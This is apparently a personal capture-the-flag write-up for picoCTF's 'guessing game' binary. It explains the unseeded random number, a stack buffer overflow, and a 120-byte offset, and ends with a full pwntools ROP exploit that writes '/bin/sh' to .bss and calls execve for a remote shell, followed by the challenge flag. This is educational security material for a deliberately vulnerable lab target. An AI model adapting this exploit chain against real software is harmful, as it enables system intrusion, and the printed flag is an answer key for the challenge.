file

A 64 bit ELF file is given.

file vuln
vuln: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=94924855c14a01a7b5b38d9ed368fba31dfd4f60, not stripped

Here’s the checksec result. We can’t use shellcode because NX is turned on.

checksec

checksec vuln
[*] '/picoctf/guessing_game/vuln'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    Stripped:   No

You can also make the ELF file yourself with the makefile.

Just install make on your *nix system and run make.

I know how to use makefiles but, I’m not too familiar with it.

If you want to understand what make is read this and this.

makefile

all:
	gcc -m64 -fno-stack-protector -O0 -no-pie -static -o vuln vuln.c

clean:
	rm vuln

I’ll explain the gcc flags used in the make file.

GCC flags

-m64 (machine 64 bit) creates a 64 bit ELF 

-fno-stack-protector (no canary)

-O0 (no compiler optimization) 

-no-pie (Not a position independent executable)

-static (statically linked)

The binary is a statically linked file.

What is static linking?

There are 2 types of linking (Static and Dynamic).

Statically linked binaries have all the necessary libraries copied in the ELF file.

Since it has all the library files inside the ELF file it’s easy to port the binary to other systems.

However, since all the library files are inside the ELF executable itself, the files are generally larger than dynamically linked files.

I made a dynamically linked version of vuln the command below.

I only got rid of the -static flag and the -m64 flag.

gcc -fno-stack-protector -O0 -no-pie -o dynamic_vuln vuln.c

vuln is the statically linked file that picoCTF gave me.

dynamic_vuln is the dynamically linked file that I made up.

du -h vuln
836K    vuln
du -h dynamic_vuln 
20K     dynamic_vuln

You can tell that the statically linked binary is almost 42 times bigger in size.

They also gave us vuln.c.

A BOF can be exploited in the win function.

#define BUFSIZE 100
void win() {
	char winner[BUFSIZE];
	printf("New winner!\nName? ");
	fgets(winner, 360, stdin);
	printf("Congrats %s\n\n", winner);
}

Let’s run the binary.

./vuln
Welcome to my guessing game!

What number would you like to guess?
3
Nope!
What number would you like to guess?

I need to get the guess the correct number, or else the program will continue to ask until I get it right.

Let’s find out what the random value is.

b get_random
r
finish
p $rax
gef➤  p $rax
$1 = 0x53

The get_random function return 0x53(83) every time you run the binary because, the random function doesn’t have a seed value.

Even though it returns 0x53(83), you have to pass 0x54(84) because the increment functions adds 1 to the return value of get_random.

Let’s run the binary again, now we’ll pass the first check because I know the random number.

./vuln
Welcome to my guessing game!

What number would you like to guess?
84   
Congrats! You win! Your prize is this print statement!

New winner!
Name? hwkim301
Congrats hwkim301

How do we get a shell though?

There isn’t a system function that I can use to pop a shell…

There’s a method we can use called ROP.

If there are available gadgets for ROP, we can chain the gadgets and control the instruction pointer by manipulating the stack.

Normally people call execve because it creates a child process to run the programs you usually want to run like '/bin/sh.

Since execve is a syscall setting the register execve needs and triggering the syscall with the syscall instruction will let you run programs you want.

Here’s what the process for setting up execve("/bin/sh",0,0) with ROP looks like .

1. A BOF overwrites the return address on the stack.

2. The program tries to return, but instead jumps to my first gadget. ex) pop rax; ret.

3. pop rax; ret executes, rax is loaded with the execve syscall number from the stack and ret jumps to the next address on the stack.

4. This continues for rdi, rsi and rdx, loading the /bin/sh address and nulls for arguments and environments.

5. Finally the syscall; ret gadget is executed and the the kernel executes execve("/bin/sh",NULL,NULL) popping a shell.

I’ve solve a couple of BOF problems before the return address were always at the size of buffer + 8 bytes for 64 bits(rbp+8) but for this problem it’s not.

The distance from winner(the buffer) to the return address is 120 bytes.

According to the disassembly although, although the buffer is only 100 bytes the program allocated 0x70(112) bytes.

On x86-64 the stack must be 16 byte aligned and the nearest multiple of 16 bigger than 100 is 112.

It needs to be 16 byte aligned, for stack alignment and space for other variables or saved registers.

There’s a nice explanation here.

gef  disass win
Dump of assembler code for function win:
  0x0000000000400c40 <+0>:     push   rbp
  0x0000000000400c41 <+1>:     mov    rbp,rsp
  0x0000000000400c44 <+4>:     sub    rsp,0x70
  0x0000000000400c48 <+8>:     lea    rdi,[rip+0x92478]        # 0x4930c7
  0x0000000000400c4f <+15>:    mov    eax,0x0
  0x0000000000400c54 <+20>:    call   0x410010 <printf>
  0x0000000000400c59 <+25>:    mov    rdx,QWORD PTR [rip+0x2b9b48]        # 0x6ba7a8 <stdin>
  0x0000000000400c60 <+32>:    lea    rax,[rbp-0x70]
  0x0000000000400c64 <+36>:    mov    esi,0x168
  0x0000000000400c69 <+41>:    mov    rdi,rax
  0x0000000000400c6c <+44>:    call   0x410a10 <fgets>
  0x0000000000400c71 <+49>:    lea    rax,[rbp-0x70]
  0x0000000000400c75 <+53>:    mov    rsi,rax
  0x0000000000400c78 <+56>:    lea    rdi,[rip+0x9245b]        # 0x4930da
  0x0000000000400c7f <+63>:    mov    eax,0x0
  0x0000000000400c84 <+68>:    call   0x410010 <printf>
  0x0000000000400c89 <+73>:    nop
  0x0000000000400c8a <+74>:    leave
  0x0000000000400c8b <+75>:    ret
End of assembler dump.

So to overwrite the return address we need 0x70+8(120) bytes.

We finished the first step, which was to overwrite the return address.

Then we need to set up the registers to call execve("/bin/sh",NULL,NULL).

How does execve("/bin/sh",NULL,NULL) call '/bin/sh'?

The OS needs to know the memory address where '/bin/sh' is stored at.

Let’s found out the memory address where '/bin/sh' is.

I ran strings -a -t x vuln | grep "/bin/sh" and it returned nothing.

This means the literal string “/bin/sh\x00” is not present in the vuln binary’s code or data sections at a fixed, known address.

Then we need to manually make the program write '/bin/sh' and then point to it.

The .bss section (and .data section) are the “blank spots” or “scratchpads” on your whiteboard.

They are designated areas for variables, and crucially, they are writable.

Since "/bin/sh" isn’t in .text or .rodata, you need a place to put it.

The .bss section is the perfect candidate because:

It’s writable. Its address is fixed and known in a statically linked, non-PIE binary

There are 2 ways to put "/bin/sh" isn’t in .text or .rodata.

  1. Using read()

This is like telling your program: “Hey, take the next 8 bytes you receive from standard input (your keyboard, or my exploit script) and write them into 0x6b7000 (the bss address).”

Your ROP chain sets up the read syscall (read(0, bss_addr, 8)).

Then, after the payload is sent, you send "/bin/sh\x00" as separate input. The read syscall catches it and places it into bss.

  1. Using mov gadgets

This is like telling your program: “Take the value I’ve cleverly placed in a register (like rdx), and copy it directly into memory at 0x6b7000 (the bss address).”

Your ROP chain sets up rdi to point to 0x6b7000 and rdx to hold "/bin/sh\x00" (which you literally put on the stack as part of your ROP chain).

Then, a mov [rdi], rdx gadget executes, performing the copy.

Now that we’ve placed '/bin/sh' in memory we can call the execve sycall.

Here’s the code for setting up the execve syscall.

It’s relatively simpler than writing '/bin/sh' to memory.

payload += p64(pop_rax)
payload += p64(0x3B) # execve syscall number 0x59 
payload += p64(pop_rdi)
payload += p64(bss) # we need to set rdi to the address of "/bin/sh" which is in the bss
payload += p64(pop_rsi)
payload += p64(0) # rsi should be NULL(0) for execve
payload += p64(pop_rdx) 
payload += p64(0) # rdx should be NULL(0) for execve
payload += p64(syscall) # run the syscall

Here’s the full code.

Exploit Code

from pwn import *

r = remote("jupiter.challenges.picoctf.org", 39940)
e = ELF("./vuln")
Rop = ROP("./vuln")

pop_rdi = Rop.find_gadget(["pop rdi", "ret"]).address 
pop_rsi = Rop.find_gadget(["pop rsi", "ret"]).address
pop_rdx = Rop.find_gadget(["pop rdx", "ret"]).address
pop_rax = Rop.find_gadget(["pop rax", "ret"]).address
syscall = Rop.find_gadget(["syscall"]).address
mov_rdi_rdx = 0x0000000000436393 # pwntools ROP class cannot find this gadget, so I found it manually with ROPgadget ...
bss = e.bss()


payload = b"A" * (0x70 + 8) # offset from the start of the buffer to the return address
payload += p64(pop_rdi)
payload += p64(bss)
payload += p64(pop_rdx)
payload += b"/bin/sh\x00"
payload += p64(mov_rdi_rdx)

payload += p64(pop_rax)
payload += p64(0x3B) # execve syscall number 0x59 
payload += p64(pop_rdi)
payload += p64(bss) # we need to set rdi to the address of "/bin/sh" which is in the bss
payload += p64(pop_rsi)
payload += p64(0) # rsi should be NULL(0) for execve
payload += p64(pop_rdx) 
payload += p64(0) # rdx should be NULL(0) for execve
payload += p64(syscall) # run the syscall

r.sendline(b"84")
r.sendlineafter(b"Name?", payload)
r.interactive()

Here’s the flag picoCTF{r0p_y0u_l1k3_4_hurr1c4n3_8cd37a0911d46b6b}.

The flag says rop you like a hurricane.

I learned a lot of stuff in this challenge.

It was super hard but still more doable then the filtered shellcode challenge.

I looked at almost all the writeups online lol.

Each writeup has a certain piece of information that other writeups don’t have.

Further Reading

Alternative /bin/sh Placement Techniques

  • Using mov gadget: Learn how to use the mov gadgets to write the '/bin/sh' string directly into memory.

    CSDN

  • Using read syscall: Velog writeup places '/bin/sh' into memory using the read syscall.

    Velog

Finding offsets

  • Understanding the 120-byte Offset: A detailed explanation on the calculation and significance of the 120-byte offset. It’s in Japanese btw.

    hatenablog

General Challenge Writeup

  • Neat writeup: A super neat and detailed writeup in traditional Chinese.

    writeup